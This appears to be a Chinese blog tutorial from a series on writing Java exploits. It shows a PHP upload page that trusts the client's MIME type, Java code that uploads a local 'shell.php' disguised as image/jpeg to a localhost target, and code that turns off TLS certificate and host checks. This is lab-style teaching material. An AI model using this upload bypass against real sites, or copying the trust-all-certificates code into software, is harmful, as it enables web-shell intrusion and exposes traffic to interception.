JAVA-Exploit编写(6)--http-request库文件上传使用

内心如初2025-01-19 8:47

目录

1.http-request简介

[2. 依赖导入](#2. 依赖导入)

3.文件上传页面代码

[4. http-request文件上传简单使用](#4. http-request文件上传简单使用)

5.请求https的网站解决SSL证书的问题

[5. 1 直接请求带https域名的网站](#5. 1 直接请求带https域名的网站)

[5.2 信任所有证书](#5.2 信任所有证书)

1.http-request简介

http-request 是一个库 里面提供很多方法,使得很容易就可以构造http请求,相比于之前使用的标准库类等要简单使用很多,目前通过此库来编写EXP较多.

2. 依赖导入

bash 复制代码 
<dependency>
      <groupId>com.github.kevinsawicki</groupId>
      <artifactId>http-request</artifactId>
      <version>5.6</version>
</dependency>

3.文件上传页面代码

php 复制代码 
<?php
if (($_FILES["file"]["type"] == "image/gif" || $_FILES["file"]["type"] == "image/jpeg" || $_FILES["file"]["type"] == "image/png") && $_FILES["file"]["size"] < 20000) {
    if ($_FILES["file"]["error"] > 0) {
        echo "Return Code: " . $_FILES["file"]["error"] . "<br />";
        echo "Size: " . ($_FILES["file"]["size"] / 1024) . " Kb<br />";
        echo "Temp file: " . $_FILES["file"]["tmp_name"] . "<br />";
    } else {
        if (file_exists("uploads/" . $_FILES["file"]["name"])) {
            echo $_FILES["file"]["name"] . " already exists. ";
        } else {
            move_uploaded_file($_FILES["file"]["tmp_name"], "uploads/" . $_FILES["file"]["name"]);
            echo "Stored in: " . "uploads/" . $_FILES["file"]["name"];
        }
    }
} else {
    echo "Invalid file";
}
?>

4. http-request文件上传简单使用

相比于之前使用的标准库和httpcomponents库来说,使用起来简单很多,通过设置文件头和.part方法即可,一看就懂.

java 复制代码 
package com.deger.HttpRequest;

import com.github.kevinsawicki.http.HttpRequest;

import java.io.File;

public class HttpRequestUpload {
    public static void main(String[] args) {
        // 文件上传
        HttpRequest httpRequest = HttpRequest.post("http://127.0.0.1/upload.php");
        // 设置请求头的文件类型
        httpRequest.header( "content-Type","multipart/form-data;boundary=AaB03x");
        // 设置上传的文件 以及上传文件位置
        httpRequest.part("file","test123.php","image/jpeg",new File("D:\\phpstudy_pro\\WWW\\shell.php"));
        // 接收响应信息
        System.out.println(httpRequest.body());

    }
}

5.请求https的网站解决SSL证书的问题

5. 1 直接请求带https域名的网站

java 复制代码 
package com.deger.HttpRequest;


import com.github.kevinsawicki.http.HttpRequest;

public class HttpRequestSsl {
    public static void main(String[] args) {
        HttpRequest httpRequest = HttpRequest.get("https://www.xxxxxx.com");
        System.out.println(httpRequest.body());
    }
}

5.2 信任所有证书

只需要使用两个方法就可以正常使用了

java 复制代码 
package com.deger.HttpRequest;


import com.github.kevinsawicki.http.HttpRequest;

public class HttpRequestSsl {
    public static void main(String[] args) {
        HttpRequest httpRequest = HttpRequest.get("https://www.xxxxx.com");
        //信息所有证书和主机
        httpRequest.trustAllCerts();
        httpRequest.trustAllHosts();
        System.out.println(httpRequest.body());
    }
}
相关推荐
vx_BS8133013 分钟前
【直接可用源码免费送】计算机毕业设计精选项目03574基于Python的网上商城管理系统设计与实现:Java/PHP/Python/C#小程序、单片机、成品+文档源码支持定制
java·python·课程设计
2601_9498683613 分钟前
Flutter for OpenHarmony 电子合同签署App实战 - 已签合同实现
java·开发语言·flutter
达文汐41 分钟前
【困难】力扣算法题解析LeetCode332:重新安排行程
java·数据结构·经验分享·算法·leetcode·力扣
培风图南以星河揽胜42 分钟前
Java版LeetCode热题100之零钱兑换:动态规划经典问题深度解析
java·leetcode·动态规划
code_li1 小时前
“信息安全”与“网络安全”区别
安全·网络安全·信息安全
启山智软1 小时前
【中大企业选择源码部署商城系统】
java·spring·商城开发
我真的是大笨蛋1 小时前
深度解析InnoDB如何保障Buffer与磁盘数据一致性
java·数据库·sql·mysql·性能优化
怪兽源码2 小时前
基于SpringBoot的选课调查系统
java·spring boot·后端·选课调查系统
恒悦sunsite2 小时前
Redis之配置只读账号
java·redis·bootstrap
梦里小白龙2 小时前
java 通过Minio上传文件
java·开发语言
热门推荐
01GitHub 镜像站点02Clawdbot 中文汉化版 接入微信、飞书032026美赛A题智能手机电池续航时间预测的连续时间数学模型04OpenCode 入门教程:介绍 · 安装 · 配置第三方 API (如 Claude)05OpenClaw部署与配置教程:在Mac mini上接入国产大模型与飞书062025 年大语言模型发展回顾:关键突破、意外转折与 2026 年展望07Linux下V2Ray安装配置指南08【Milvus】向量数据库pymilvus使用教程09Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services102026数学建模美赛题目特点与选题建议,常用四大模型汇总